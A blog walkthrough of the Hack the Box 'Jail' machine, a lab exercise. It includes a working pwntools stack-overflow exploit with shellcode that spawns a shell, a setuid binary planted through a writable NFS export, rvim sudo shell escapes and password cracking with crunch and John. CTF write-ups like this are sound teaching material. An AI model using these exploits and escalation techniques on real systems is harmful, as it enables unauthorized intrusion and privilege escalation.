Jail — Hack the Box Walk through

dl padmavathi
6 min readFeb 20, 2020

--

Machine Ip: 10.10.10.34

Nmap reveals below ports and services.

On the website present on 80 port nothing helpful is present.

Netcat on port 7411 gives below:

Dirbuster after a long time it had run, it gave a jailuser directory in website and a dev subdir inside it.

There are three files one c file, one executable and one compile.sh file having how the c file is executable that no debug protection or stack protection is present which kind of hints stack smashing and buffer overflow can be done.

Let’us open the c file and see.

It looks like there is a password, let’s see it that gives shell.

After taking a look at code there are commands like DEBUG, OPEN and CLOSE , so tried them too.

No success here :( now we can try buffer overflow by seeing the c code and try to fill in password “userpass” field which is the only place where strcpy is present instead of strncpy which is present in auth function.

Enter the random string containing A’s so that we can see if the A’s causing the seg fault.

As we can see EBP, ESP and EIP are being overwritten with A’s. As EIP is being overwritten it is not able to find the return address and causing seg fault.

What is our strategy here to run shell code?

So we will first find out the return address and for that we use pattern create and pattern match in gdb_peda.

Observe pattern_create and the seg fault occurred because of the inserted characters.
Observe the password value is the value created using pattern_create

Now to find the return address we use pattern match of the value where the seg fault occurred.

As we can see in the image that EIP is at offset 28, so EIP is 28 characters away from the actual password address.

Now we can write the payload for shell code. The below picture explains how the return address can be changed to the value where shell code is present.

This below is the python code.

#!/usr/bin/python
from pwn import *
import struct
shellcode = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
shellcode+="\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
shellcode+="\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
shellcode+="\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode+="\x89\xe3\x31\xc9\xcd\x80"
payload = "A"*28 + struct.pack("<I",0xffffd612 + 30) + shellcode
r = remote('10.10.10.34', 7411)
r.sendline('DEBUG')
print r.recv(1024)
r.sendline('USER admin')
print r.recv(1024)
r.sendline('PASS ' + payload)
r.interactive()

This below is the shell code being run and shell is given.

Now let us see how we can be changed from nobody to any user.

let us first create two directories and mount nfs locally. See the exported mounts for the server.

root@kali:~/Downloads# showmount -e 10.10.10.34
Export list for 10.10.10.34:
/opt *
/var/nfsshare *
root@kali:~# mount -t nfs 10.10.10.34:/var/nfsshare /tmp/nfsshare
root@kali:~# mount -t nfs 10.10.10.34:/opt /tmp/opt
root@kali:~#

As above we can create the directories and mount nfs exports on those directories.

But when trying to access these mounts they are being shown as permission denied, so first let’s see what are the users present in the machine by using nobody session and cat /etc/passwd

There is a user as frank and also as seen in the below picture the permissions for nfsshare is set to frank group. let’s create a user in attacker machine with username frank and try to access the mounted location.

Still no luck, but as we know that we don’t have read permissions for frank user also from the nobody session.

drwx-wx — x. 2 root frank 24 Feb 20 07:11 nfsshare

But we do have write and exec permissions, so let’s try writing a setuid function in attacker machine and wget to make the effective user of any user(like nobody) can have frank privileges.

root@kali:~/Documents# cat setuid.c 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main( int argc, char *argv[] )
{
setreuid(1000, 1000);
printf("Effective ID is: %d\n", geteuid());
printf("Real ID is: %d\n", getuid());
execve("/bin/sh", NULL, NULL);
}

Make it as setuid function and now run this setuid function in the nobody session.

As we can see in the above image, we got frank privileges and can see the flag now. Yay! half way done. Now let’s see if we have any setuid commands for this user.

[frank@localhost nfsshare]$ $ sudo -l
sudo -l
Matching Defaults entries for frank on this host:
!visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME
HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG
LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION
LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
_XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User frank may run the following commands on this host:
(frank) NOPASSWD: /opt/logreader/logreader.sh
(adm) NOPASSWD: /usr/bin/rvim /var/www/html/jailuser/dev/jail.c
[frank@localhost nfsshare]$ $

let’s try using sudo -u adm /usr/bin/rvim /var/www/html/jailuser/dev/jail.c

And enter :diffpatch $(sh <&2 >&2) will give u shell with adm privileges.

or one can use python vim as below:

:py import os

:py os.system(“/bin/sh”)

Now let us see any hints or files given,

Now that’s the first hint but is this ssh password or is it they key for cracking keys.rar. I did base64 0f keys.rar and I copied in kali as below

Now there is one more .local file as below.

This above looks like cryptography problem for that I used https://quipqiup.com/ and it gives as below.

Searching in google alcatraz and frank gives frank morris and movie year is 196 so one we have to bruteforce for special character.

we can use crunch as below:

crunch 11 11 -o jail-wlist -f /usr/share/crunch/charset.lst symbols-all -t Morris1962@

And use john2rar and john as below to crack the password.

rar2john keys.rar >jailhash
john --format=rar --wordlist=jail-wlist jailhash

unrar the keys.rar with the password found using john. It gives the ssh public key.

This is a public key we have to check if the private key is a weak one.

For that we can use this https://github.com/Ganapati/RsaCtfTool tool as below.

Now we copy and change the permissions and try to login using ssh as below and we can see the flag.

Yaaaay! and its done.

--

--

dl padmavathi

I go by Padma. I am a security enthusiast. This blog contains security related and some general stuff. E-mail:pduggire@gmu.edu